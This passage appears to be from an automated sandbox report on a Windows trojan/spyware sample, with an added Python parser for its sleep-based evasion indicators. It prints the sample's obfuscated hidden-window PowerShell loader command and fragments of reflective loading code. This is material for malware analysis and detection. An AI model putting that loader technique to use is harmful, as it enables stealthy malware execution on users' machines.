            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228361206_2_22836120
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22832F206_2_22832F20
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22834B406_2_22834B40
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228319406_2_22831940
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228367506_2_22836750
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228367606_2_22836760
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228335606_2_22833560
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228303606_2_22830360
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22841CF06_2_22841CF0
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_228484706_2_22848470
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284FB306_2_2284FB30
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22840E8B6_2_22840E8B
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284A0906_2_2284A090
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284D2906_2_2284D290
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_22840E986_2_22840E98
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_2284BCB06_2_2284BCB0
            Source: fGu8xWoMrg.exe | Static PE information: invalid certificate
            Source: fGu8xWoMrg.exe, 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebiddens lokalsamfund.exe4 vs fGu8xWoMrg.exe
            Source: fGu8xWoMrg.exe | Binary or memory string: OriginalFilenamebiddens lokalsamfund.exe4 vs fGu8xWoMrg.exe
            Source: fGu8xWoMrg.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/16@6/6
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 0_2_004034F7
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 6_2_004034F7
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | Code function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW | 0_2_00404954
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | Code function: 0_2_004021AA CoCreateInstance | 0_2_004021AA
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semitelic.ini
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6172:120:WilError_03
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | File created: C:\Users\user\AppData\Local\Temp\nsm8554.tmp
            Source: fGu8xWoMrg.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: fGu8xWoMrg.exe | Virustotal: Detection: 75%
            Source: fGu8xWoMrg.exe | ReversingLabs: Detection: 63%
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | File read: C:\Users\user\Desktop\fGu8xWoMrg.exe
            Source: unknown | Process created: C:\Users\user\Desktop\fGu8xWoMrg.exe "C:\Users\user\Desktop\fGu8xWoMrg.exe"
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe "C:\Users\user\AppData\Local\Temp\Mangedoblende.exe"
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | Sections loaded: uxtheme.dll, userenv.dll, apphelp.dll, propsys.dll, dwmapi.dll, cryptbase.dll, oleacc.dll, ntmarta.dll, version.dll, shfolder.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, riched20.dll, usp10.dll, msls31.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, wintypes.dll, profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, kdscli.dll, ncrypt.dll, ntasn1.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll, ntmarta.dll, apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Sections loaded: wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, iphlpapi.dll, mswsock.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, mscoree.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, dhcpcsvc6.dll, dhcpcsvc.dll, secur32.dll
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: fGu8xWoMrg.exe | Static file information: File size 1119496 > 1048576
            Source: fGu8xWoMrg.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: stem.Core.pdb | source: powershell.exe, 00000002.00000002.2502967073.00000000072FA000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Yara match | File source: 00000002.00000002.2521881649.0000000009B31000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Spaakoners $Skibsside63 $Covenants), (Impactment @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Unacetic = [AppDomain]::CurrentDomain.GetAssemblies()$glob
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Petiteness)), $Osmanie).DefineDynamicModule($Cologne, $false).DefineType($Forehock, $marcipanmasserne, [System.MulticastDelegate])$Bre
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08F93710 push 8BD38B50h; iretd | 2_2_08F93716
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08FA3CA0 push cs; retf | 2_2_08FA3CB1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08FA466D pushad ; retf | 2_2_08FA466E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08FA05D1 push esi; ret | 2_2_08FA05D2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08FA2BCA push ebp; iretd | 2_2_08FA2BCC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08FA2DCC push ebx; retf | 2_2_08FA2DDE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08FA03B4 push ds; ret | 2_2_08FA03B6
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08FA2D85 push ebx; retf | 2_2_08FA2DDE
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_00189011 push edx; iretd | 6_2_00189012
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_0018A031 pushad ; iretd | 6_2_0018A032
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_00189091 push ebx; iretd | 6_2_00189092
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_00189094 push ebp; iretd | 6_2_00189462
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_0018A088 pushad ; iretd | 6_2_0018A0EA
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_00189089 push ebx; iretd | 6_2_0018908A
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_0018A0F1 pushad ; iretd | 6_2_0018A0F2
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_0018A0E8 pushad ; iretd | 6_2_0018A0EA
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_00189468 push esi; iretd | 6_2_0018961A
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_00188490 push edx; iretd | 6_2_00188EEA
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_00188489 push eax; iretd | 6_2_0018848A
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_00188481 push ecx; iretd | 6_2_00188482
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_00189611 push edi; iretd | 6_2_00189612
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_00189DE0 pushad ; iretd | 6_2_0018A02A
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_00188EF1 push edx; iretd | 6_2_00188EF2
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_016D2DCC push ebx; retf | 6_2_016D2DDE
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_016D05D1 push esi; ret | 6_2_016D05D2
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_016D2D85 push ebx; retf | 6_2_016D2DDE
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_016D3CA0 push cs; retf | 6_2_016D3CB1
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_016D2BCA push ebp; iretd | 6_2_016D2BCC
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_016D03B4 push ds; ret | 6_2_016D03B6
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_016D466D pushad ; retf | 6_2_016D466E
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | File created: C:\Users\user\AppData\Local\Temp\nsc9301.tmp\nsExec.dll (dropped file)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe (dropped file)
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semitelic.ini

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (102 occurrences)
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Process information set: NOOPENFILEERRORBOX (59 occurrences)

            Malware Analysis System Evasion

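The rows below are the raw evidence behind the "Contains long sleeps (>= 3 min)", "Allocates memory with a write watch" and thread-delay signatures listed in the overview. As an added example that is not part of the Joe Sandbox report, the Python below parses rows in this section's format (it also accepts the merged-cell form "Mangedoblende.exeThread delayed" and a trailing "Jump to behavior" link label), aggregates them per source image, and maps the aggregates back onto those signatures. The sample rows are a hand-picked subset copied from this section; the threshold constants, the signature wording and the assumption that "delay time" values are milliseconds are the editor's, not Joe Sandbox's implementation. One arithmetic fact it relies on: 922337203685477 is Int64.MaxValue in 100 ns ticks divided down to milliseconds, so a delay of that size never expires in practice.

```python
"""Aggregate sandbox behaviour rows into the evasion heuristics this report applies.

Added example, not part of the Joe Sandbox report.
"""
import re
from collections import defaultdict

# Thresholds as the report's own rows and signature names state them:
# "Contains long sleeps (>= 3 min)", "Thread sleep count: 38 > 30",
# "Thread sleep time: -600000s >= -30000s".
LONG_SLEEP_MS = 3 * 60 * 1000
SLEEP_COUNT_LIMIT = 30
SLEEP_TIME_LIMIT = 30000

# Int64.MaxValue in 100 ns ticks, converted to milliseconds: exactly the
# 922337203685477 shown in the powershell.exe and Mangedoblende.exe delay rows.
INFINITE_WAIT_MS = (2**63 - 1) // 10_000

# Row shape: "Source: <image path> [TID: <n>] <event text>". The "\s*" after the
# image path also accepts the merged-cell form ("...exeThread delayed").
ROW_RE = re.compile(r"^Source:\s*(?P<src>.+?\.exe)\s*(?:TID:\s*(?P<tid>\d+)\s*)?(?P<event>.+?)\s*$")
# Assumption: "delay time" is milliseconds (600000 is then the 10-minute sleep behind
# the ">= 3 min" signature). "Thread sleep time" rows carry an "s" suffix in the
# report but show the same numbers as the delay rows, so they are read as one unit.
DELAY_RE = re.compile(r"Thread delayed: delay time: (?P<ms>\d+)")
SLEEP_COUNT_RE = re.compile(r"Thread sleep count: (?P<n>\d+) > \d+")
SLEEP_TIME_RE = re.compile(r"Thread sleep time: -(?P<ms>\d+)s >= -\d+s")
WRITE_WATCH_RE = re.compile(r"Memory allocated: (?P<addr>[0-9A-Fa-f]+) memory reserve \| memory write watch")

# Constructed sample: a subset of rows from this section, one of them left in the
# raw merged-cell form with the "Jump to behavior" link label still attached.
SAMPLE_ROWS = r"""
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Memory allocated: D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Memory allocated: 1F3A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeMemory allocated: 213A0000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 6556 Thread sleep count: 8486 > 30
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5376 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\Desktop\fGu8xWoMrg.exeProcess information set: NOOPENFILEERRORBOX
"""


def parse_rows(text):
    """Yield (source image, tid or None, event text) for every row matching the row shape."""
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            yield m.group("src"), m.group("tid"), m.group("event")


def analyze(text):
    """Aggregate delay, sleep-count, sleep-time and write-watch rows per source image."""
    stats = defaultdict(lambda: {"delay_calls": 0, "delay_total_ms": 0, "delay_max_ms": 0,
                                 "sleep_count_max": 0, "sleep_time_max": 0,
                                 "write_watch_allocs": []})
    for src, _tid, event in parse_rows(text):
        s = stats[src]
        m = DELAY_RE.search(event)
        if m:
            ms = int(m.group("ms"))
            s["delay_calls"] += 1
            s["delay_total_ms"] += ms
            s["delay_max_ms"] = max(s["delay_max_ms"], ms)
            continue
        m = SLEEP_COUNT_RE.search(event)
        if m:
            s["sleep_count_max"] = max(s["sleep_count_max"], int(m.group("n")))
            continue
        m = SLEEP_TIME_RE.search(event)
        if m:
            s["sleep_time_max"] = max(s["sleep_time_max"], int(m.group("ms")))
            continue
        m = WRITE_WATCH_RE.search(event)
        if m:
            s["write_watch_allocs"].append(m.group("addr").upper())
    return dict(stats)


def verdicts(stats):
    """Map the aggregates onto this report's signature wording (editor's mapping)."""
    out = {}
    for src, s in stats.items():
        hits = []
        if s["delay_max_ms"] >= LONG_SLEEP_MS:
            hits.append("Contains long sleeps (>= 3 min)")
        if s["delay_max_ms"] >= INFINITE_WAIT_MS:
            hits.append("requests an effectively infinite wait")
        if s["sleep_count_max"] > SLEEP_COUNT_LIMIT:
            hits.append("sleep loop: more than %d sleeps in one thread" % SLEEP_COUNT_LIMIT)
        if s["sleep_time_max"] >= SLEEP_TIME_LIMIT:
            hits.append("single sleep at or above the %d threshold" % SLEEP_TIME_LIMIT)
        if s["write_watch_allocs"]:
            hits.append("Allocates memory with a write watch (potentially for evading sandboxes)")
        out[src] = hits
    return out


if __name__ == "__main__":
    for src, hits in verdicts(analyze(SAMPLE_ROWS)).items():
        print(src)
        for h in hits or ["no evasion indicators in the sampled rows"]:
            print("    " + h)
```

Run stand-alone it prints one block per image; fGu8xWoMrg.exe comes out clean because its only sampled row (NOOPENFILEERRORBOX) is not an evasion indicator, while Mangedoblende.exe collects all five hits and powershell.exe only the sleep-related ones. The count-of-sleeps heuristic (8486 in one thread) is the one that survives a sandbox that patches long sleeps to return immediately, which is why both are worth tracking separately.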
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe API/Special instruction interceptor: Address: 2755974
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Memory allocated: D0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Memory allocated: 1F3A0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Memory allocated: 213A0000 memory reserve | memory write watch
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 600000
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 599891
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 599766
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 599656
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 599547
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 599437
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 599328
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 599219
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 599109
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 599000
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 598890
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 598781
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 598672
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 598562
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 598453
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 598344
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 598234
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 598124
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 598015
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 597891
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 597781
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 597672
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 597562
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 597453
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 597344
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 597219
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 597109
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 597000
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 596890
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 596780
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 596672
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 596562
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 596453
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 596344
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 596219
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 596109
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 596000
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 595890
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 595781
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 595672
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 595562
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 595453
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 595344
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 595234
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 595125
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 595015
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 594897
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 594797
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 594687
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Thread delayed: delay time: 594568
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7113
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2610
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Window / User API: threadDelayed 8486
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe Window / User API: threadDelayed 1359
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsc9301.tmp\nsExec.dll
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe API coverage: 2.5 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5376 Thread sleep time: -7378697629483816s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep count: 38 > 30
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -35048813740048126s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -600000s >= -30000s
